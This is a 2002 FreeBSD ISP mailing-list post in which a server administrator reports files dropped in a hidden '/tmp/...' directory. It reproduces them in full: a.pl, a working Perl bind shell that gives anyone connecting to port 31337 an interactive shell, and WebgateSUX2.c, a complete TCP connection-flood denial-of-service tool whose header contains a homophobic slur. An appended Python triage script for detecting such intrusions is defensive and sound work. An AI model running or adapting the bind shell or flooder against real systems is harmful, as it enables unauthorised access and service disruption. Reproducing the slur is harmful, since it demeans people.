From owner-freebsd-isp Wed Sep 25 9: 2: 0 2002
Delivered-To: freebsd-isp@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EAB8337B401 for ; Wed, 25 Sep 2002 09:01:55 -0700 (PDT)
Received: from digitaldaemon.com (digitaldaemon.com [63.105.9.34]) by mx1.FreeBSD.org (Postfix) with SMTP id 27F2A43E42 for ; Wed, 25 Sep 2002 09:01:55 -0700 (PDT) (envelope-from jan@digitaldaemon.com)
Received: (qmail 97993 invoked from network); 25 Sep 2002 15:54:44 -0000
Received: from unknown (HELO digitaldaemon.com) (192.168.0.220) by digitaldaemon.com with SMTP; 25 Sep 2002 15:54:44 -0000
Message-ID: <3D91DE68.90206@digitaldaemon.com>
Date: Wed, 25 Sep 2002 12:03:52 -0400
From: Jan Knepper
Organization: http://www.digitaldaemon.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1b) Gecko/20020721
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: FreeBSD ISP
Subject: Found... WingateSUX2.c, a.pl (DoS attacker?)
Content-Type: multipart/mixed
Sender: owner-freebsd-isp@FreeBSD.ORG
Precedence: bulk

Hi!

I just returned to the office from a trip to China and found a directory "..." in /tmp, i.e. "/tmp/...". In this directory I found the attached junk. a.pl was running as a Perl script, which of course has been killed by now. Next to that, I am filtering access to port 31337 now to see if I can track where this comes from. The user and group for the files were those of the Apache server. I figured that someone used an SSL vulnerability to dump some files on the server and make it a launch point for a DoS attack. Is this correct?
Has anyone else seen this kind of stuff?

Thanks!
Jan

[Attachment: a.pl]

#!/usr/bin/perl
# Bind shell: listens on TCP 31337 and hands every accepted connection
# an interactive /bin/sh, running as whatever user started the script
# (here, the Apache user).
use Socket;
$port = 31337;
socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while (1) {
    accept(X, S);
    if (!($pid = fork)) {
        if (!defined $pid) { exit(0); }
        # Child: wire the socket to stdin/stdout/stderr, then become a shell.
        open STDIN,  "<&X";
        open STDOUT, ">&X";
        open STDERR, ">&X";
        exec("/bin/sh -i");
        close X;
    }
}

[Attachment: WebgateSUX2.c]

/* ********** WebgateSUX.c by Himika **********
 *
 * FOR PRIVATE USE ONLY!!!
 *
 * This simple program establishes lots of connections
 * to a target host and keeps them alive until you make
 * it close them. It takes following args:
 *
 * ./WebgateSUX [port]
 *
 * where is hostname of the victim;
 * is an integer defining how many
 * connections do you want to establish to the target;
 * [port] as optional numerical parameter specifies port
 * to use for establish connections to the host. By default
 * it's 6667 for obvious reasons:)
 *
 * Note: You can't establish as many connections as you want.
 * You're restricted to the number of file descriptors your
 * OS supports. On Win98 you can create only about 70 connections.
 * On most Linux boxes you're limited to 400-500, depending
 * on the amount of other running applications.
 * Currently, this DoS tools uses only TCP connections.
 *
 *
 * Blames to: abo - You'll be soon dead... fuckin gay.
 *
 * Greets to: everyone who helps in the war against him.
 *
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define MAX_CONNECTIONS 1000

int main(int argc, char *argv[])
{
    int conns, sock[MAX_CONNECTIONS], i, c, port;
    struct hostent *host;
    struct sockaddr_in server;

    if (argc < 3 || argc > 4) {
        printf("Usage: %s <# of connections> [port]\n", argv[0]);
        exit(1);
    }
    if ((host = gethostbyname(argv[1])) == 0) {
        herror("gethostbyname");
        exit(1);
    }
    conns = atoi(argv[2]);
    if (conns > MAX_CONNECTIONS || conns < 0) {
        printf("Please select connections number between 0 and 1000.\n");
        printf("This version supports up to 1000 simultaneous connections.");
        printf("If you desire creating more than 1000, then just edit and fix the source code. Sorry homez, coders should use script-kiddies protections.\n");
        exit(1);
    }
    if (argv[3])
        port = atoi(argv[3]);
    server.sin_family = AF_INET;
    server.sin_addr = *((struct in_addr *)host->h_addr);
    if (argv[3])
        server.sin_port = htons(port);
    else
        server.sin_port = htons(6667);
    memset(&server.sin_zero, 0, 8);
    printf("Attacking %s...\n", argv[1]);
    while (1) {
        for (i = 0; i < conns; i++) {
            if ((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                i--;
                perror("socket");
                continue;
            }
            if (connect(sock[i], (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
                perror("connect");
                i--;
                continue;
            }
        }
        for (c = i; i >= 0; i--)
            send(sock[i], "USER aaa aaa aaa aaa\nNICK aaaaaa\nQUIT\n", 40, 0);
        for (; c >= 0; c--)
            close(sock[c]);
        printf(".");
    }
}
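Added here as a defender's triage aid; this is not part of Jan's post or of the attached files. It flags directories under a scratch path whose names are made only of dots and spaces (the "/tmp/..." trick above, generalised to ". " style names too) and parses FreeBSD `sockstat -4 -l` style output for listeners on 31337 or for interpreters listening as the web-server account. The sockstat sample, the port set and the user/command names are constructed assumptions.

```python
import os
import shutil
import tempfile
# Constructed sample in the column layout of FreeBSD `sockstat -4 -l`, not real output.
SAMPLE_SOCKSTAT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
www      perl       4321  3  tcp4   *:31337               *:*
www      httpd      1234  16 tcp4   *:80                  *:*
"""
WATCH_PORTS = {31337}                       # port the dropped a.pl listens on
WEB_USERS = {"www", "nobody", "apache"}     # assumed web-server accounts
SHELL_LIKE = {"perl", "sh", "csh", "bash"}  # interpreters a bind shell shows up as

def dot_only_dirs(root):
    """Directories directly under root named only with dots/spaces, e.g. '...' or '.. '."""
    hits = []
    for name in os.listdir(root):  # listdir never returns '.' or '..'
        if set(name) <= {".", " "} and os.path.isdir(os.path.join(root, name)):
            hits.append(name)
    return sorted(hits)

def suspicious_listeners(sockstat_text):
    """Flag listeners on a watched port, or shell-like commands listening as the web user."""
    findings = []
    for line in sockstat_text.splitlines()[1:]:  # skip the header row
        parts = line.split()
        if len(parts) < 6:
            continue
        user, command, pid, _fd, _proto, local = parts[:6]
        port = local.rsplit(":", 1)[-1]
        if not port.isdigit():
            continue
        reasons = []
        if int(port) in WATCH_PORTS:
            reasons.append("watched port %s" % port)
        if user in WEB_USERS and command in SHELL_LIKE:
            reasons.append("%s listening as web user %s" % (command, user))
        if reasons:
            findings.append({"pid": int(pid), "user": user, "command": command,
                             "port": int(port), "reasons": reasons})
    return findings

def triage_demo():
    """Build a constructed temp tree holding a '...' directory and run both checks."""
    root = tempfile.mkdtemp(prefix="triage-")
    try:
        os.mkdir(os.path.join(root, "..."))        # the hidden directory from the post
        os.mkdir(os.path.join(root, ".X11-unix"))  # ordinary dot-dir, must not match
        return dot_only_dirs(root), suspicious_listeners(SAMPLE_SOCKSTAT)
    finally:
        shutil.rmtree(root)
```

On a live host, feed `dot_only_dirs` the real /tmp and /var/tmp and `suspicious_listeners` the actual `sockstat -4 -l` output; a hit on the web-server account is the cue to pull the process's open files and environment before killing it.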